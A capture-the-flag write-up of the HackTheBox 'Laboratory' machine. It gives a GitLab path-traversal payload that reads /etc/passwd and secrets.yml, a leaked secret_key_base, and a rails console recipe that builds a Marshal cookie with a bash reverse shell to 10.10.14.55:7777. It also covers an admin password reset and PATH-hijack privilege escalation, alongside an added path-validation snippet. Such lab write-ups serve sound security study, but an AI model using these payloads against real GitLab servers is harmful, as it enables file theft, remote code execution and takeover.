HackTheBox-Laboratory

  • Name: Laboratory
  • OS: Linux

Visiting http://laboratory.htb redirects to https. Inspecting the certificate reveals another subdomain, git.laboratory.htb.

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

git.laboratory.htb

Visiting git.laboratory.htb shows a GitLab page. You can register an account yourself, but the e-mail address must end in laboratory.htb. After registering I wandered around at random and found nothing of interest. Eventually I found the GitLab version.

0x02 Exploitation

LFI

  1. Create two projects (a and b).

  2. In project a, open an issue.

    Its body is: ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

  3. Move this issue to project b.

  4. Click the link.


Vulnerability details: Arbitrary file read via the UploadsRewriter when moving an issue
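The traversal above works because the rewriter copies whatever path the markdown reference names. The following is an added example (not code from this writeup or from GitLab itself) of how such a reference can be validated before any file is touched; the uploads root and the resolve_upload_ref helper are assumptions made for the example.

```ruby
# Constructed uploads root for this example (not GitLab's real layout).
UPLOADS_ROOT = "/var/opt/gitlab/uploads"

# Matches the markdown upload reference that gets rewritten when an issue moves:
#   ![alt](/uploads/<32-hex-secret>/<filename>)
UPLOAD_REF = %r{!\[[^\]]*\]\(/uploads/(?<secret>[^/)]+)/(?<path>[^)]+)\)}

# Returns the absolute source path the reference would be copied from, or nil
# when the reference must be refused. Two independent checks are applied:
#   1. the secret directory segment must be exactly 32 hex characters
#   2. the fully resolved path must remain inside UPLOADS_ROOT/<secret>/
# The payload from the issue above passes check 1 (32 ones are valid hex) and
# is only stopped by check 2, which is why both are needed.
def resolve_upload_ref(markdown, root = UPLOADS_ROOT)
  m = UPLOAD_REF.match(markdown)
  return nil unless m

  secret = m[:secret]
  rel    = m[:path]
  return nil unless secret.match?(/\A[0-9a-f]{32}\z/)

  base = File.expand_path(File.join(root, secret))
  # expand_path collapses every "..", so a traversal payload resolves to a
  # location outside base and the prefix test below fails.
  full = File.expand_path(File.join(base, rel))
  return nil unless full.start_with?(base + File::SEPARATOR)

  full
end
```

A real implementation should additionally resolve symlinks (File.realpath) at copy time, since expand_path only normalises the string.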

RCE

But if you keep reading the vulnerability report, you will find that because cookies_serializer is set to :hybrid, this LFI can ultimately be turned into an RCE.

HackerOne - Arbitrary file read via the UploadsRewriter when moving and issue

It's possible to turn this into an RCE as the cookies_serializer is set to :hybrid by default.

This can be done by first grabbing the secret_key_base from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml using the arbitrary file read and then using the experimentation_subject_id cookie with a Marshalled payload.

A payload can be generated by changing your own gitlab instance's secret_key_base to match, then running the following in a rails console

Following the CVE for this LFI I found an exploit, gitlab_rce, but it needs a modification.

self.email_domain = "gmail.htb"
must be changed to
self.email_domain = "laboratory.htb"

This script can also be used to get a shell, but it is a restricted one.

Here I recommend exploiting this vulnerability manually; I set up a local GitLab environment to reproduce it.

First use the LFI to read secrets.yml and obtain the secret_key_base field.

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)


The secret_key_base field in the local GitLab's secrets.yml has to be replaced with the victim machine's value.

vim /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3


Once it is replaced, open the rails console.

Enter the following lines in order. These commands execute once on the local machine before the cookie is produced, so only start listening on the port after you have obtained the cookie.

sudo gitlab-rails console
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.55/7777 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]


Open the rails console and reset the dexter user's password.

> user = User.where(id: 1).first
=> #<User id: 1, @dexter>
> user.password=12345678
=> 12345678
> user.password_confirmation=12345678
=> 12345678
> user.save!
=> true
> quit


Successfully logged in as the dexter user.

In the secure_docker project you can find an id_rsa; download it and set its permissions to 600.
(It is best to copy the contents yourself and paste them into a file.)

0x03 Privilege Escalation

Once inside, I first took a quick look at the SUID files, and the result...

There is no strings on the target machine, so I could only inspect it with cat; it is a very simple binary.

It calls chmod, but not by absolute path, so this is a PATH environment variable privilege escalation.

cd /tmp
echo '/usr/bin/bash' >chmod
export PATH=/tmp:$PATH
/usr/local/bin/docker-security


0x04 References